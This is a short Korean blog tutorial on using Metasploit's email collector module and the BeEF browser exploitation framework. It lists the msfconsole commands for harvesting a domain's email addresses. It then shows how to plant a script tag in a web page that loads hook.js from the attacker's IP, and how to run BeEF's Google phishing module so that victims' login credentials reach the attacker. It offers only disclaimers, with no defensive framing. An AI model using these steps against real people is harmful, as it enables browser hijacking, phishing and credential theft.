msf 이용하기 // beEF 사용법

msfconsole 을 이용하여 많은 정보를 찾을 수 있다.

앞에서 보여준 정보들 뿐아니라 이메일 주소까지 알아낼수 있다. 

하지만 msf 자체는 미국에 중점이 되어 한국 정보는 많이 없다는 점이다...

(악의적인 행위의 책임은 사용자 본인에게 있습니다.)

1. use auxiliary/gather/search_email_collector

2. set domain [도메인]

3. run

BeEF

BeEF는 Browser Exploit Framework 로써 사용자 PC의 정보 수집부터 공격까지 가능한 도구이다. 

주로 xss(크로스 사이트스크립트)공격 취약점을 찾기 위해 사용이된다. 

그럼 xss란 무엇일까? 

이는 웹에서 사용하는 클라이언트 스크립트를 통해 특정한 행동을 일으키는 취약점을 말한다.

beEF 설치!!

apt-get install beef-xss

먼저 BeEF를 실행시키기 전에 apache2를 실행시키자 

1. service apache2 start

전 이미 실행 되고 있다고 뜨네요!!

다음은 BeEF-xss를 실행시켜보자!!

2. beef-xss

입력하고 몇초 기다리면 

이러한 창이 뜬다. (ID: beef // PW: beef)

이러한 창이 뜨는데 저같은 경우에는 잠시 뭘한다고 사용한흔적이 있네요. 왼쪽에 보면 IP들이 등록되어 있습니다.

이제 한가지 하셔야할 것이있습니다.!!!

3. cd /var/www <=이동후 index.html 내용을

4. vi index.html

<script src="http://공격자 IP :3000/hook.js"></script>

입력을 해주시고 esc : wq 차례로 눌러주시면서 나옵니다.

그 후 피해자 컴퓨터에서 공격자 아이피로접속하시면 

왼쪽에 이러하게 표시됩니다. 

21 : Attacker IP

41 : Victim IP

이제 41번 IP를 눌러보면 

이러한 창이 나옵니다.

위의 메뉴바 같은 곳에서 commands라는 버튼이 있습니다.

여기서 명령을 내릴수 있는데요?

각종 모듈이 있습니다. 여기서 골라 사용하시면 됩니다.

간단한 것을 하나 해볼까요?

구글 피싱사이트를 만들어 보겠습니다.

social engineering에서 google phishing을 누르신후 execute를 클릭하면 적용이됩니다.

이렇게 나옵니다. 저는 전에 한적이 몇번 있어서 8 이라고 찍히네요.

피해자 컴퓨터에서 공격자 IP를 입력하면 이렇게 구글 메일창이뜹니다.!!!

과연로그인을 하면?

이렇게 공격자에게 다넘어온다는 사실!!!

다시한번 말하지만 모든 책임은 사용자에게 있습니다.!!

모듈에 metasploit모듈이 0이다. 이를 검색해보니

http://blog.naver.com/PostView.nhn?blogId=chogar&logNo=220000745475&redirect=Dlog&widgetTypeCall=true <= 블로그가 나왔다.! 한번읽어보장!